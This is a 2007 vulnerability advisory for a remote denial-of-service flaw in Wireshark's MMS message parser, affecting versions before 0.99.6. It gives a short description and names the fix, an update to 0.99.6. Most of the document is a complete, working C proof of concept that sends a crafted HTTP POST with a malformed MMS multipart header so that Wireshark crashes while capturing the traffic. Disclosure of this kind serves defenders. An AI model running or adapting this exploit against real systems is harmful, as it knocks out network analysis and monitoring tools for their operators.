WireShark MMS Remote Denial of Service vulnerability
Title
=====
WireShark MMS Remote Denial of Service vulnerability
Date
====
13 August 2007
Affected Software
=================
WireShark < 0.99.6
Maybe all version of Ethereal
Overview
========
MMS message parse flaw in WireShark implementation may allow a remote attacker
to crash it causing denial of service.
Vulnerability Description
=====================
MMS means "Multimedia Messaging Service". When WireShark parsing a MMS message
which Content-Type is application/vnd.wap.multipart.mixed, and the header len
of a multipart content equels to 0x00, then it will be crash.
Solution
========
Update to 0.99.6
PoC
================================
//main.cpp
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
char *http =
"POST / HTTP/1.0\r\n"
"Content-Type: application/vnd.wap.mms-message\r\n";
char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";
unsigned char mms[] =
{
0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
0x8d,0x92,//X-Mms-MMS-Version: 1.2
0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x00,//To:
13510000000
0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
//////////////////////////////////////////////////
0x01,//multipart,count
0x0f,//HeadersLen
0x05,//DataLen
0x00,//headlen <<<=== If this is 0x00, then wireshark will be crash.
The real value is the follow three lines bytes which is 0x0e
///
0x83,0x85,//Utf-8
0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,//Name: zwell.txt
0x81,0xea,//Charset: utf-8
///
0x7a,0x77,0x65,0x6c,0x6c,//zwell
};
SOCKET connect_to_host(char *h, int p)
{
SOCKET sock;
struct hostent *host;
struct sockaddr_in saddr;
if((host=gethostbyname(h))==NULL)
{
printf("resolv host %s error\n", h);
exit(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
printf("create socket error\n");
exit(-1);
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
{
printf("connect to host %s on port %d error\n", h, p);
exit(-1);
}
return sock;
}
void socket_init()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2,0), &wsaData);
}
int main(int argc, char **argv)
{
SOCKET s;
char sendbuf[1024];
int len = 0;
printf("WireShark<0.99.6 MMS protocol DOS PoC\nCoded By
ZwelL\nhttp://www.nosec.org\n");
if(argc != 3)
{
printf("usage : %s <host> <port>\n", argv[0]);
exit(-1);
}
socket_init();
s = connect_to_host(argv[1], atoi(argv[2]));
strcpy(&sendbuf[len], http);
len += strlen(http);
sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2]));
len = strlen(sendbuf);
sprintf(&sendbuf[len], contentlenstr, sizeof(mms));
len = strlen(sendbuf);
memcpy(&sendbuf[len], mms, sizeof(mms));
len += sizeof(mms);
send(s, sendbuf, len, 0);
printf("completed!\n");
return 0;
}